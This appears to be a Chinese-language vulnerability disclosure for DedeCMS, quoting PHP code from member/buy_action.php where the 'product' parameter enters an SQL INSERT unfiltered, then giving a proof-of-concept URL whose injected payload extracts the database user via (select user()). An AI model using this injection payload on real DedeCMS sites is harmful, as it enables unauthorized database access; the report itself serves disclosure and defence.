详细说明:
member/buy_action.php
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略XX行
if(empty($product))
{
ShowMsg("请选择一个产品!", 'javascript:;');
exit();
}
省略xxx行
=if(!isset($paytype))
{
$inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
";
echo $inquery."<br>" ;
漏洞证明:
测试方法
注册用户之后验证邮箱完了之后 打开
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然后在http://127.0.0.1/dedecms/member/operation.php
就可以查看到返回信息了